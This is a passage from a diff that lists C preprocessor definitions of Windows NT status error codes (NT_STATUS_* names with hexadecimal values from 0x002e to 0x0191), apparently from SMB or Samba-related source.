+-#define NT_STATUS_INVALID_PORT_ATTRIBUTES (0xC0000000 | 0x002e)
+-#define NT_STATUS_PORT_MESSAGE_TOO_LONG (0xC0000000 | 0x002f)
+-#define NT_STATUS_INVALID_PARAMETER_MIX (0xC0000000 | 0x0030)
+-#define NT_STATUS_INVALID_QUOTA_LOWER (0xC0000000 | 0x0031)
+-#define NT_STATUS_DISK_CORRUPT_ERROR (0xC0000000 | 0x0032)
+-#define NT_STATUS_OBJECT_NAME_INVALID (0xC0000000 | 0x0033)
+-#define NT_STATUS_OBJECT_NAME_NOT_FOUND (0xC0000000 | 0x0034)
+-#define NT_STATUS_OBJECT_NAME_COLLISION (0xC0000000 | 0x0035)
+-#define NT_STATUS_HANDLE_NOT_WAITABLE (0xC0000000 | 0x0036)
+-#define NT_STATUS_PORT_DISCONNECTED (0xC0000000 | 0x0037)
+-#define NT_STATUS_DEVICE_ALREADY_ATTACHED (0xC0000000 | 0x0038)
+-#define NT_STATUS_OBJECT_PATH_INVALID (0xC0000000 | 0x0039)
+-#define NT_STATUS_OBJECT_PATH_NOT_FOUND (0xC0000000 | 0x003a)
+-#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD (0xC0000000 | 0x003b)
+-#define NT_STATUS_DATA_OVERRUN (0xC0000000 | 0x003c)
+-#define NT_STATUS_DATA_LATE_ERROR (0xC0000000 | 0x003d)
+-#define NT_STATUS_DATA_ERROR (0xC0000000 | 0x003e)
+-#define NT_STATUS_CRC_ERROR (0xC0000000 | 0x003f)
+-#define NT_STATUS_SECTION_TOO_BIG (0xC0000000 | 0x0040)
+-#define NT_STATUS_PORT_CONNECTION_REFUSED (0xC0000000 | 0x0041)
+-#define NT_STATUS_INVALID_PORT_HANDLE (0xC0000000 | 0x0042)
+-#define NT_STATUS_SHARING_VIOLATION (0xC0000000 | 0x0043)
+-#define NT_STATUS_QUOTA_EXCEEDED (0xC0000000 | 0x0044)
+-#define NT_STATUS_INVALID_PAGE_PROTECTION (0xC0000000 | 0x0045)
+-#define NT_STATUS_MUTANT_NOT_OWNED (0xC0000000 | 0x0046)
+-#define NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED (0xC0000000 | 0x0047)
+-#define NT_STATUS_PORT_ALREADY_SET (0xC0000000 | 0x0048)
+-#define NT_STATUS_SECTION_NOT_IMAGE (0xC0000000 | 0x0049)
+-#define NT_STATUS_SUSPEND_COUNT_EXCEEDED (0xC0000000 | 0x004a)
+-#define NT_STATUS_THREAD_IS_TERMINATING (0xC0000000 | 0x004b)
+-#define NT_STATUS_BAD_WORKING_SET_LIMIT (0xC0000000 | 0x004c)
+-#define NT_STATUS_INCOMPATIBLE_FILE_MAP (0xC0000000 | 0x004d)
+-#define NT_STATUS_SECTION_PROTECTION (0xC0000000 | 0x004e)
+-#define NT_STATUS_EAS_NOT_SUPPORTED (0xC0000000 | 0x004f)
+-#define NT_STATUS_EA_TOO_LARGE (0xC0000000 | 0x0050)
+-#define NT_STATUS_NONEXISTENT_EA_ENTRY (0xC0000000 | 0x0051)
+-#define NT_STATUS_NO_EAS_ON_FILE (0xC0000000 | 0x0052)
+-#define NT_STATUS_EA_CORRUPT_ERROR (0xC0000000 | 0x0053)
+-#define NT_STATUS_FILE_LOCK_CONFLICT (0xC0000000 | 0x0054)
+-#define NT_STATUS_LOCK_NOT_GRANTED (0xC0000000 | 0x0055)
+-#define NT_STATUS_DELETE_PENDING (0xC0000000 | 0x0056)
+-#define NT_STATUS_CTL_FILE_NOT_SUPPORTED (0xC0000000 | 0x0057)
+-#define NT_STATUS_UNKNOWN_REVISION (0xC0000000 | 0x0058)
+-#define NT_STATUS_REVISION_MISMATCH (0xC0000000 | 0x0059)
+-#define NT_STATUS_INVALID_OWNER (0xC0000000 | 0x005a)
+-#define NT_STATUS_INVALID_PRIMARY_GROUP (0xC0000000 | 0x005b)
+-#define NT_STATUS_NO_IMPERSONATION_TOKEN (0xC0000000 | 0x005c)
+-#define NT_STATUS_CANT_DISABLE_MANDATORY (0xC0000000 | 0x005d)
+-#define NT_STATUS_NO_LOGON_SERVERS (0xC0000000 | 0x005e)
+-#define NT_STATUS_NO_SUCH_LOGON_SESSION (0xC0000000 | 0x005f)
+-#define NT_STATUS_NO_SUCH_PRIVILEGE (0xC0000000 | 0x0060)
+-#define NT_STATUS_PRIVILEGE_NOT_HELD (0xC0000000 | 0x0061)
+-#define NT_STATUS_INVALID_ACCOUNT_NAME (0xC0000000 | 0x0062)
+-#define NT_STATUS_USER_EXISTS (0xC0000000 | 0x0063)
+-#define NT_STATUS_NO_SUCH_USER (0xC0000000 | 0x0064)
+-#define NT_STATUS_GROUP_EXISTS (0xC0000000 | 0x0065)
+-#define NT_STATUS_NO_SUCH_GROUP (0xC0000000 | 0x0066)
+-#define NT_STATUS_MEMBER_IN_GROUP (0xC0000000 | 0x0067)
+-#define NT_STATUS_MEMBER_NOT_IN_GROUP (0xC0000000 | 0x0068)
+-#define NT_STATUS_LAST_ADMIN (0xC0000000 | 0x0069)
+-#define NT_STATUS_WRONG_PASSWORD (0xC0000000 | 0x006a)
+-#define NT_STATUS_ILL_FORMED_PASSWORD (0xC0000000 | 0x006b)
+-#define NT_STATUS_PASSWORD_RESTRICTION (0xC0000000 | 0x006c)
+-#define NT_STATUS_LOGON_FAILURE (0xC0000000 | 0x006d)
+-#define NT_STATUS_ACCOUNT_RESTRICTION (0xC0000000 | 0x006e)
+-#define NT_STATUS_INVALID_LOGON_HOURS (0xC0000000 | 0x006f)
+-#define NT_STATUS_INVALID_WORKSTATION (0xC0000000 | 0x0070)
+-#define NT_STATUS_PASSWORD_EXPIRED (0xC0000000 | 0x0071)
+-#define NT_STATUS_ACCOUNT_DISABLED (0xC0000000 | 0x0072)
+-#define NT_STATUS_NONE_MAPPED (0xC0000000 | 0x0073)
+-#define NT_STATUS_TOO_MANY_LUIDS_REQUESTED (0xC0000000 | 0x0074)
+-#define NT_STATUS_LUIDS_EXHAUSTED (0xC0000000 | 0x0075)
+-#define NT_STATUS_INVALID_SUB_AUTHORITY (0xC0000000 | 0x0076)
+-#define NT_STATUS_INVALID_ACL (0xC0000000 | 0x0077)
+-#define NT_STATUS_INVALID_SID (0xC0000000 | 0x0078)
+-#define NT_STATUS_INVALID_SECURITY_DESCR (0xC0000000 | 0x0079)
+-#define NT_STATUS_PROCEDURE_NOT_FOUND (0xC0000000 | 0x007a)
+-#define NT_STATUS_INVALID_IMAGE_FORMAT (0xC0000000 | 0x007b)
+-#define NT_STATUS_NO_TOKEN (0xC0000000 | 0x007c)
+-#define NT_STATUS_BAD_INHERITANCE_ACL (0xC0000000 | 0x007d)
+-#define NT_STATUS_RANGE_NOT_LOCKED (0xC0000000 | 0x007e)
+-#define NT_STATUS_DISK_FULL (0xC0000000 | 0x007f)
+-#define NT_STATUS_SERVER_DISABLED (0xC0000000 | 0x0080)
+-#define NT_STATUS_SERVER_NOT_DISABLED (0xC0000000 | 0x0081)
+-#define NT_STATUS_TOO_MANY_GUIDS_REQUESTED (0xC0000000 | 0x0082)
+-#define NT_STATUS_GUIDS_EXHAUSTED (0xC0000000 | 0x0083)
+-#define NT_STATUS_INVALID_ID_AUTHORITY (0xC0000000 | 0x0084)
+-#define NT_STATUS_AGENTS_EXHAUSTED (0xC0000000 | 0x0085)
+-#define NT_STATUS_INVALID_VOLUME_LABEL (0xC0000000 | 0x0086)
+-#define NT_STATUS_SECTION_NOT_EXTENDED (0xC0000000 | 0x0087)
+-#define NT_STATUS_NOT_MAPPED_DATA (0xC0000000 | 0x0088)
+-#define NT_STATUS_RESOURCE_DATA_NOT_FOUND (0xC0000000 | 0x0089)
+-#define NT_STATUS_RESOURCE_TYPE_NOT_FOUND (0xC0000000 | 0x008a)
+-#define NT_STATUS_RESOURCE_NAME_NOT_FOUND (0xC0000000 | 0x008b)
+-#define NT_STATUS_ARRAY_BOUNDS_EXCEEDED (0xC0000000 | 0x008c)
+-#define NT_STATUS_FLOAT_DENORMAL_OPERAND (0xC0000000 | 0x008d)
+-#define NT_STATUS_FLOAT_DIVIDE_BY_ZERO (0xC0000000 | 0x008e)
+-#define NT_STATUS_FLOAT_INEXACT_RESULT (0xC0000000 | 0x008f)
+-#define NT_STATUS_FLOAT_INVALID_OPERATION (0xC0000000 | 0x0090)
+-#define NT_STATUS_FLOAT_OVERFLOW (0xC0000000 | 0x0091)
+-#define NT_STATUS_FLOAT_STACK_CHECK (0xC0000000 | 0x0092)
+-#define NT_STATUS_FLOAT_UNDERFLOW (0xC0000000 | 0x0093)
+-#define NT_STATUS_INTEGER_DIVIDE_BY_ZERO (0xC0000000 | 0x0094)
+-#define NT_STATUS_INTEGER_OVERFLOW (0xC0000000 | 0x0095)
+-#define NT_STATUS_PRIVILEGED_INSTRUCTION (0xC0000000 | 0x0096)
+-#define NT_STATUS_TOO_MANY_PAGING_FILES (0xC0000000 | 0x0097)
+-#define NT_STATUS_FILE_INVALID (0xC0000000 | 0x0098)
+-#define NT_STATUS_ALLOTTED_SPACE_EXCEEDED (0xC0000000 | 0x0099)
+-#define NT_STATUS_INSUFFICIENT_RESOURCES (0xC0000000 | 0x009a)
+-#define NT_STATUS_DFS_EXIT_PATH_FOUND (0xC0000000 | 0x009b)
+-#define NT_STATUS_DEVICE_DATA_ERROR (0xC0000000 | 0x009c)
+-#define NT_STATUS_DEVICE_NOT_CONNECTED (0xC0000000 | 0x009d)
+-#define NT_STATUS_DEVICE_POWER_FAILURE (0xC0000000 | 0x009e)
+-#define NT_STATUS_FREE_VM_NOT_AT_BASE (0xC0000000 | 0x009f)
+-#define NT_STATUS_MEMORY_NOT_ALLOCATED (0xC0000000 | 0x00a0)
+-#define NT_STATUS_WORKING_SET_QUOTA (0xC0000000 | 0x00a1)
+-#define NT_STATUS_MEDIA_WRITE_PROTECTED (0xC0000000 | 0x00a2)
+-#define NT_STATUS_DEVICE_NOT_READY (0xC0000000 | 0x00a3)
+-#define NT_STATUS_INVALID_GROUP_ATTRIBUTES (0xC0000000 | 0x00a4)
+-#define NT_STATUS_BAD_IMPERSONATION_LEVEL (0xC0000000 | 0x00a5)
+-#define NT_STATUS_CANT_OPEN_ANONYMOUS (0xC0000000 | 0x00a6)
+-#define NT_STATUS_BAD_VALIDATION_CLASS (0xC0000000 | 0x00a7)
+-#define NT_STATUS_BAD_TOKEN_TYPE (0xC0000000 | 0x00a8)
+-#define NT_STATUS_BAD_MASTER_BOOT_RECORD (0xC0000000 | 0x00a9)
+-#define NT_STATUS_INSTRUCTION_MISALIGNMENT (0xC0000000 | 0x00aa)
+-#define NT_STATUS_INSTANCE_NOT_AVAILABLE (0xC0000000 | 0x00ab)
+-#define NT_STATUS_PIPE_NOT_AVAILABLE (0xC0000000 | 0x00ac)
+-#define NT_STATUS_INVALID_PIPE_STATE (0xC0000000 | 0x00ad)
+-#define NT_STATUS_PIPE_BUSY (0xC0000000 | 0x00ae)
+-#define NT_STATUS_ILLEGAL_FUNCTION (0xC0000000 | 0x00af)
+-#define NT_STATUS_PIPE_DISCONNECTED (0xC0000000 | 0x00b0)
+-#define NT_STATUS_PIPE_CLOSING (0xC0000000 | 0x00b1)
+-#define NT_STATUS_PIPE_CONNECTED (0xC0000000 | 0x00b2)
+-#define NT_STATUS_PIPE_LISTENING (0xC0000000 | 0x00b3)
+-#define NT_STATUS_INVALID_READ_MODE (0xC0000000 | 0x00b4)
+-#define NT_STATUS_IO_TIMEOUT (0xC0000000 | 0x00b5)
+-#define NT_STATUS_FILE_FORCED_CLOSED (0xC0000000 | 0x00b6)
+-#define NT_STATUS_PROFILING_NOT_STARTED (0xC0000000 | 0x00b7)
+-#define NT_STATUS_PROFILING_NOT_STOPPED (0xC0000000 | 0x00b8)
+-#define NT_STATUS_COULD_NOT_INTERPRET (0xC0000000 | 0x00b9)
+-#define NT_STATUS_FILE_IS_A_DIRECTORY (0xC0000000 | 0x00ba)
+-#define NT_STATUS_NOT_SUPPORTED (0xC0000000 | 0x00bb)
+-#define NT_STATUS_REMOTE_NOT_LISTENING (0xC0000000 | 0x00bc)
+-#define NT_STATUS_DUPLICATE_NAME (0xC0000000 | 0x00bd)
+-#define NT_STATUS_BAD_NETWORK_PATH (0xC0000000 | 0x00be)
+-#define NT_STATUS_NETWORK_BUSY (0xC0000000 | 0x00bf)
+-#define NT_STATUS_DEVICE_DOES_NOT_EXIST (0xC0000000 | 0x00c0)
+-#define NT_STATUS_TOO_MANY_COMMANDS (0xC0000000 | 0x00c1)
+-#define NT_STATUS_ADAPTER_HARDWARE_ERROR (0xC0000000 | 0x00c2)
+-#define NT_STATUS_INVALID_NETWORK_RESPONSE (0xC0000000 | 0x00c3)
+-#define NT_STATUS_UNEXPECTED_NETWORK_ERROR (0xC0000000 | 0x00c4)
+-#define NT_STATUS_BAD_REMOTE_ADAPTER (0xC0000000 | 0x00c5)
+-#define NT_STATUS_PRINT_QUEUE_FULL (0xC0000000 | 0x00c6)
+-#define NT_STATUS_NO_SPOOL_SPACE (0xC0000000 | 0x00c7)
+-#define NT_STATUS_PRINT_CANCELLED (0xC0000000 | 0x00c8)
+-#define NT_STATUS_NETWORK_NAME_DELETED (0xC0000000 | 0x00c9)
+-#define NT_STATUS_NETWORK_ACCESS_DENIED (0xC0000000 | 0x00ca)
+-#define NT_STATUS_BAD_DEVICE_TYPE (0xC0000000 | 0x00cb)
+-#define NT_STATUS_BAD_NETWORK_NAME (0xC0000000 | 0x00cc)
+-#define NT_STATUS_TOO_MANY_NAMES (0xC0000000 | 0x00cd)
+-#define NT_STATUS_TOO_MANY_SESSIONS (0xC0000000 | 0x00ce)
+-#define NT_STATUS_SHARING_PAUSED (0xC0000000 | 0x00cf)
+-#define NT_STATUS_REQUEST_NOT_ACCEPTED (0xC0000000 | 0x00d0)
+-#define NT_STATUS_REDIRECTOR_PAUSED (0xC0000000 | 0x00d1)
+-#define NT_STATUS_NET_WRITE_FAULT (0xC0000000 | 0x00d2)
+-#define NT_STATUS_PROFILING_AT_LIMIT (0xC0000000 | 0x00d3)
+-#define NT_STATUS_NOT_SAME_DEVICE (0xC0000000 | 0x00d4)
+-#define NT_STATUS_FILE_RENAMED (0xC0000000 | 0x00d5)
+-#define NT_STATUS_VIRTUAL_CIRCUIT_CLOSED (0xC0000000 | 0x00d6)
+-#define NT_STATUS_NO_SECURITY_ON_OBJECT (0xC0000000 | 0x00d7)
+-#define NT_STATUS_CANT_WAIT (0xC0000000 | 0x00d8)
+-#define NT_STATUS_PIPE_EMPTY (0xC0000000 | 0x00d9)
+-#define NT_STATUS_CANT_ACCESS_DOMAIN_INFO (0xC0000000 | 0x00da)
+-#define NT_STATUS_CANT_TERMINATE_SELF (0xC0000000 | 0x00db)
+-#define NT_STATUS_INVALID_SERVER_STATE (0xC0000000 | 0x00dc)
+-#define NT_STATUS_INVALID_DOMAIN_STATE (0xC0000000 | 0x00dd)
+-#define NT_STATUS_INVALID_DOMAIN_ROLE (0xC0000000 | 0x00de)
+-#define NT_STATUS_NO_SUCH_DOMAIN (0xC0000000 | 0x00df)
+-#define NT_STATUS_DOMAIN_EXISTS (0xC0000000 | 0x00e0)
+-#define NT_STATUS_DOMAIN_LIMIT_EXCEEDED (0xC0000000 | 0x00e1)
+-#define NT_STATUS_OPLOCK_NOT_GRANTED (0xC0000000 | 0x00e2)
+-#define NT_STATUS_INVALID_OPLOCK_PROTOCOL (0xC0000000 | 0x00e3)
+-#define NT_STATUS_INTERNAL_DB_CORRUPTION (0xC0000000 | 0x00e4)
+-#define NT_STATUS_INTERNAL_ERROR (0xC0000000 | 0x00e5)
+-#define NT_STATUS_GENERIC_NOT_MAPPED (0xC0000000 | 0x00e6)
+-#define NT_STATUS_BAD_DESCRIPTOR_FORMAT (0xC0000000 | 0x00e7)
+-#define NT_STATUS_INVALID_USER_BUFFER (0xC0000000 | 0x00e8)
+-#define NT_STATUS_UNEXPECTED_IO_ERROR (0xC0000000 | 0x00e9)
+-#define NT_STATUS_UNEXPECTED_MM_CREATE_ERR (0xC0000000 | 0x00ea)
+-#define NT_STATUS_UNEXPECTED_MM_MAP_ERROR (0xC0000000 | 0x00eb)
+-#define NT_STATUS_UNEXPECTED_MM_EXTEND_ERR (0xC0000000 | 0x00ec)
+-#define NT_STATUS_NOT_LOGON_PROCESS (0xC0000000 | 0x00ed)
+-#define NT_STATUS_LOGON_SESSION_EXISTS (0xC0000000 | 0x00ee)
+-#define NT_STATUS_INVALID_PARAMETER_1 (0xC0000000 | 0x00ef)
+-#define NT_STATUS_INVALID_PARAMETER_2 (0xC0000000 | 0x00f0)
+-#define NT_STATUS_INVALID_PARAMETER_3 (0xC0000000 | 0x00f1)
+-#define NT_STATUS_INVALID_PARAMETER_4 (0xC0000000 | 0x00f2)
+-#define NT_STATUS_INVALID_PARAMETER_5 (0xC0000000 | 0x00f3)
+-#define NT_STATUS_INVALID_PARAMETER_6 (0xC0000000 | 0x00f4)
+-#define NT_STATUS_INVALID_PARAMETER_7 (0xC0000000 | 0x00f5)
+-#define NT_STATUS_INVALID_PARAMETER_8 (0xC0000000 | 0x00f6)
+-#define NT_STATUS_INVALID_PARAMETER_9 (0xC0000000 | 0x00f7)
+-#define NT_STATUS_INVALID_PARAMETER_10 (0xC0000000 | 0x00f8)
+-#define NT_STATUS_INVALID_PARAMETER_11 (0xC0000000 | 0x00f9)
+-#define NT_STATUS_INVALID_PARAMETER_12 (0xC0000000 | 0x00fa)
+-#define NT_STATUS_REDIRECTOR_NOT_STARTED (0xC0000000 | 0x00fb)
+-#define NT_STATUS_REDIRECTOR_STARTED (0xC0000000 | 0x00fc)
+-#define NT_STATUS_STACK_OVERFLOW (0xC0000000 | 0x00fd)
+-#define NT_STATUS_NO_SUCH_PACKAGE (0xC0000000 | 0x00fe)
+-#define NT_STATUS_BAD_FUNCTION_TABLE (0xC0000000 | 0x00ff)
+-#define NT_STATUS_DIRECTORY_NOT_EMPTY (0xC0000000 | 0x0101)
+-#define NT_STATUS_FILE_CORRUPT_ERROR (0xC0000000 | 0x0102)
+-#define NT_STATUS_NOT_A_DIRECTORY (0xC0000000 | 0x0103)
+-#define NT_STATUS_BAD_LOGON_SESSION_STATE (0xC0000000 | 0x0104)
+-#define NT_STATUS_LOGON_SESSION_COLLISION (0xC0000000 | 0x0105)
+-#define NT_STATUS_NAME_TOO_LONG (0xC0000000 | 0x0106)
+-#define NT_STATUS_FILES_OPEN (0xC0000000 | 0x0107)
+-#define NT_STATUS_CONNECTION_IN_USE (0xC0000000 | 0x0108)
+-#define NT_STATUS_MESSAGE_NOT_FOUND (0xC0000000 | 0x0109)
+-#define NT_STATUS_PROCESS_IS_TERMINATING (0xC0000000 | 0x010a)
+-#define NT_STATUS_INVALID_LOGON_TYPE (0xC0000000 | 0x010b)
+-#define NT_STATUS_NO_GUID_TRANSLATION (0xC0000000 | 0x010c)
+-#define NT_STATUS_CANNOT_IMPERSONATE (0xC0000000 | 0x010d)
+-#define NT_STATUS_IMAGE_ALREADY_LOADED (0xC0000000 | 0x010e)
+-#define NT_STATUS_ABIOS_NOT_PRESENT (0xC0000000 | 0x010f)
+-#define NT_STATUS_ABIOS_LID_NOT_EXIST (0xC0000000 | 0x0110)
+-#define NT_STATUS_ABIOS_LID_ALREADY_OWNED (0xC0000000 | 0x0111)
+-#define NT_STATUS_ABIOS_NOT_LID_OWNER (0xC0000000 | 0x0112)
+-#define NT_STATUS_ABIOS_INVALID_COMMAND (0xC0000000 | 0x0113)
+-#define NT_STATUS_ABIOS_INVALID_LID (0xC0000000 | 0x0114)
+-#define NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE (0xC0000000 | 0x0115)
+-#define NT_STATUS_ABIOS_INVALID_SELECTOR (0xC0000000 | 0x0116)
+-#define NT_STATUS_NO_LDT (0xC0000000 | 0x0117)
+-#define NT_STATUS_INVALID_LDT_SIZE (0xC0000000 | 0x0118)
+-#define NT_STATUS_INVALID_LDT_OFFSET (0xC0000000 | 0x0119)
+-#define NT_STATUS_INVALID_LDT_DESCRIPTOR (0xC0000000 | 0x011a)
+-#define NT_STATUS_INVALID_IMAGE_NE_FORMAT (0xC0000000 | 0x011b)
+-#define NT_STATUS_RXACT_INVALID_STATE (0xC0000000 | 0x011c)
+-#define NT_STATUS_RXACT_COMMIT_FAILURE (0xC0000000 | 0x011d)
+-#define NT_STATUS_MAPPED_FILE_SIZE_ZERO (0xC0000000 | 0x011e)
+-#define NT_STATUS_TOO_MANY_OPENED_FILES (0xC0000000 | 0x011f)
+-#define NT_STATUS_CANCELLED (0xC0000000 | 0x0120)
+-#define NT_STATUS_CANNOT_DELETE (0xC0000000 | 0x0121)
+-#define NT_STATUS_INVALID_COMPUTER_NAME (0xC0000000 | 0x0122)
+-#define NT_STATUS_FILE_DELETED (0xC0000000 | 0x0123)
+-#define NT_STATUS_SPECIAL_ACCOUNT (0xC0000000 | 0x0124)
+-#define NT_STATUS_SPECIAL_GROUP (0xC0000000 | 0x0125)
+-#define NT_STATUS_SPECIAL_USER (0xC0000000 | 0x0126)
+-#define NT_STATUS_MEMBERS_PRIMARY_GROUP (0xC0000000 | 0x0127)
+-#define NT_STATUS_FILE_CLOSED (0xC0000000 | 0x0128)
+-#define NT_STATUS_TOO_MANY_THREADS (0xC0000000 | 0x0129)
+-#define NT_STATUS_THREAD_NOT_IN_PROCESS (0xC0000000 | 0x012a)
+-#define NT_STATUS_TOKEN_ALREADY_IN_USE (0xC0000000 | 0x012b)
+-#define NT_STATUS_PAGEFILE_QUOTA_EXCEEDED (0xC0000000 | 0x012c)
+-#define NT_STATUS_COMMITMENT_LIMIT (0xC0000000 | 0x012d)
+-#define NT_STATUS_INVALID_IMAGE_LE_FORMAT (0xC0000000 | 0x012e)
+-#define NT_STATUS_INVALID_IMAGE_NOT_MZ (0xC0000000 | 0x012f)
+-#define NT_STATUS_INVALID_IMAGE_PROTECT (0xC0000000 | 0x0130)
+-#define NT_STATUS_INVALID_IMAGE_WIN_16 (0xC0000000 | 0x0131)
+-#define NT_STATUS_LOGON_SERVER_CONFLICT (0xC0000000 | 0x0132)
+-#define NT_STATUS_TIME_DIFFERENCE_AT_DC (0xC0000000 | 0x0133)
+-#define NT_STATUS_SYNCHRONIZATION_REQUIRED (0xC0000000 | 0x0134)
+-#define NT_STATUS_DLL_NOT_FOUND (0xC0000000 | 0x0135)
+-#define NT_STATUS_OPEN_FAILED (0xC0000000 | 0x0136)
+-#define NT_STATUS_IO_PRIVILEGE_FAILED (0xC0000000 | 0x0137)
+-#define NT_STATUS_ORDINAL_NOT_FOUND (0xC0000000 | 0x0138)
+-#define NT_STATUS_ENTRYPOINT_NOT_FOUND (0xC0000000 | 0x0139)
+-#define NT_STATUS_CONTROL_C_EXIT (0xC0000000 | 0x013a)
+-#define NT_STATUS_LOCAL_DISCONNECT (0xC0000000 | 0x013b)
+-#define NT_STATUS_REMOTE_DISCONNECT (0xC0000000 | 0x013c)
+-#define NT_STATUS_REMOTE_RESOURCES (0xC0000000 | 0x013d)
+-#define NT_STATUS_LINK_FAILED (0xC0000000 | 0x013e)
+-#define NT_STATUS_LINK_TIMEOUT (0xC0000000 | 0x013f)
+-#define NT_STATUS_INVALID_CONNECTION (0xC0000000 | 0x0140)
+-#define NT_STATUS_INVALID_ADDRESS (0xC0000000 | 0x0141)
+-#define NT_STATUS_DLL_INIT_FAILED (0xC0000000 | 0x0142)
+-#define NT_STATUS_MISSING_SYSTEMFILE (0xC0000000 | 0x0143)
+-#define NT_STATUS_UNHANDLED_EXCEPTION (0xC0000000 | 0x0144)
+-#define NT_STATUS_APP_INIT_FAILURE (0xC0000000 | 0x0145)
+-#define NT_STATUS_PAGEFILE_CREATE_FAILED (0xC0000000 | 0x0146)
+-#define NT_STATUS_NO_PAGEFILE (0xC0000000 | 0x0147)
+-#define NT_STATUS_INVALID_LEVEL (0xC0000000 | 0x0148)
+-#define NT_STATUS_WRONG_PASSWORD_CORE (0xC0000000 | 0x0149)
+-#define NT_STATUS_ILLEGAL_FLOAT_CONTEXT (0xC0000000 | 0x014a)
+-#define NT_STATUS_PIPE_BROKEN (0xC0000000 | 0x014b)
+-#define NT_STATUS_REGISTRY_CORRUPT (0xC0000000 | 0x014c)
+-#define NT_STATUS_REGISTRY_IO_FAILED (0xC0000000 | 0x014d)
+-#define NT_STATUS_NO_EVENT_PAIR (0xC0000000 | 0x014e)
+-#define NT_STATUS_UNRECOGNIZED_VOLUME (0xC0000000 | 0x014f)
+-#define NT_STATUS_SERIAL_NO_DEVICE_INITED (0xC0000000 | 0x0150)
+-#define NT_STATUS_NO_SUCH_ALIAS (0xC0000000 | 0x0151)
+-#define NT_STATUS_MEMBER_NOT_IN_ALIAS (0xC0000000 | 0x0152)
+-#define NT_STATUS_MEMBER_IN_ALIAS (0xC0000000 | 0x0153)
+-#define NT_STATUS_ALIAS_EXISTS (0xC0000000 | 0x0154)
+-#define NT_STATUS_LOGON_NOT_GRANTED (0xC0000000 | 0x0155)
+-#define NT_STATUS_TOO_MANY_SECRETS (0xC0000000 | 0x0156)
+-#define NT_STATUS_SECRET_TOO_LONG (0xC0000000 | 0x0157)
+-#define NT_STATUS_INTERNAL_DB_ERROR (0xC0000000 | 0x0158)
+-#define NT_STATUS_FULLSCREEN_MODE (0xC0000000 | 0x0159)
+-#define NT_STATUS_TOO_MANY_CONTEXT_IDS (0xC0000000 | 0x015a)
+-#define NT_STATUS_LOGON_TYPE_NOT_GRANTED (0xC0000000 | 0x015b)
+-#define NT_STATUS_NOT_REGISTRY_FILE (0xC0000000 | 0x015c)
+-#define NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED (0xC0000000 | 0x015d)
+-#define NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR (0xC0000000 | 0x015e)
+-#define NT_STATUS_FT_MISSING_MEMBER (0xC0000000 | 0x015f)
+-#define NT_STATUS_ILL_FORMED_SERVICE_ENTRY (0xC0000000 | 0x0160)
+-#define NT_STATUS_ILLEGAL_CHARACTER (0xC0000000 | 0x0161)
+-#define NT_STATUS_UNMAPPABLE_CHARACTER (0xC0000000 | 0x0162)
+-#define NT_STATUS_UNDEFINED_CHARACTER (0xC0000000 | 0x0163)
+-#define NT_STATUS_FLOPPY_VOLUME (0xC0000000 | 0x0164)
+-#define NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND (0xC0000000 | 0x0165)
+-#define NT_STATUS_FLOPPY_WRONG_CYLINDER (0xC0000000 | 0x0166)
+-#define NT_STATUS_FLOPPY_UNKNOWN_ERROR (0xC0000000 | 0x0167)
+-#define NT_STATUS_FLOPPY_BAD_REGISTERS (0xC0000000 | 0x0168)
+-#define NT_STATUS_DISK_RECALIBRATE_FAILED (0xC0000000 | 0x0169)
+-#define NT_STATUS_DISK_OPERATION_FAILED (0xC0000000 | 0x016a)
+-#define NT_STATUS_DISK_RESET_FAILED (0xC0000000 | 0x016b)
+-#define NT_STATUS_SHARED_IRQ_BUSY (0xC0000000 | 0x016c)
+-#define NT_STATUS_FT_ORPHANING (0xC0000000 | 0x016d)
+-#define NT_STATUS_PARTITION_FAILURE (0xC0000000 | 0x0172)
+-#define NT_STATUS_INVALID_BLOCK_LENGTH (0xC0000000 | 0x0173)
+-#define NT_STATUS_DEVICE_NOT_PARTITIONED (0xC0000000 | 0x0174)
+-#define NT_STATUS_UNABLE_TO_LOCK_MEDIA (0xC0000000 | 0x0175)
+-#define NT_STATUS_UNABLE_TO_UNLOAD_MEDIA (0xC0000000 | 0x0176)
+-#define NT_STATUS_EOM_OVERFLOW (0xC0000000 | 0x0177)
+-#define NT_STATUS_NO_MEDIA (0xC0000000 | 0x0178)
+-#define NT_STATUS_NO_SUCH_MEMBER (0xC0000000 | 0x017a)
+-#define NT_STATUS_INVALID_MEMBER (0xC0000000 | 0x017b)
+-#define NT_STATUS_KEY_DELETED (0xC0000000 | 0x017c)
+-#define NT_STATUS_NO_LOG_SPACE (0xC0000000 | 0x017d)
+-#define NT_STATUS_TOO_MANY_SIDS (0xC0000000 | 0x017e)
+-#define NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED (0xC0000000 | 0x017f)
+-#define NT_STATUS_KEY_HAS_CHILDREN (0xC0000000 | 0x0180)
+-#define NT_STATUS_CHILD_MUST_BE_VOLATILE (0xC0000000 | 0x0181)
+-#define NT_STATUS_DEVICE_CONFIGURATION_ERROR (0xC0000000 | 0x0182)
+-#define NT_STATUS_DRIVER_INTERNAL_ERROR (0xC0000000 | 0x0183)
+-#define NT_STATUS_INVALID_DEVICE_STATE (0xC0000000 | 0x0184)
+-#define NT_STATUS_IO_DEVICE_ERROR (0xC0000000 | 0x0185)
+-#define NT_STATUS_DEVICE_PROTOCOL_ERROR (0xC0000000 | 0x0186)
+-#define NT_STATUS_BACKUP_CONTROLLER (0xC0000000 | 0x0187)
+-#define NT_STATUS_LOG_FILE_FULL (0xC0000000 | 0x0188)
+-#define NT_STATUS_TOO_LATE (0xC0000000 | 0x0189)
+-#define NT_STATUS_NO_TRUST_LSA_SECRET (0xC0000000 | 0x018a)
+-#define NT_STATUS_NO_TRUST_SAM_ACCOUNT (0xC0000000 | 0x018b)
+-#define NT_STATUS_TRUSTED_DOMAIN_FAILURE (0xC0000000 | 0x018c)
+-#define NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE (0xC0000000 | 0x018d)
+-#define NT_STATUS_EVENTLOG_FILE_CORRUPT (0xC0000000 | 0x018e)
+-#define NT_STATUS_EVENTLOG_CANT_START (0xC0000000 | 0x018f)
+-#define NT_STATUS_TRUST_FAILURE (0xC0000000 | 0x0190)
+-#define NT_STATUS_MUTANT_LIMIT_EXCEEDED (0xC0000000 | 0x0191)
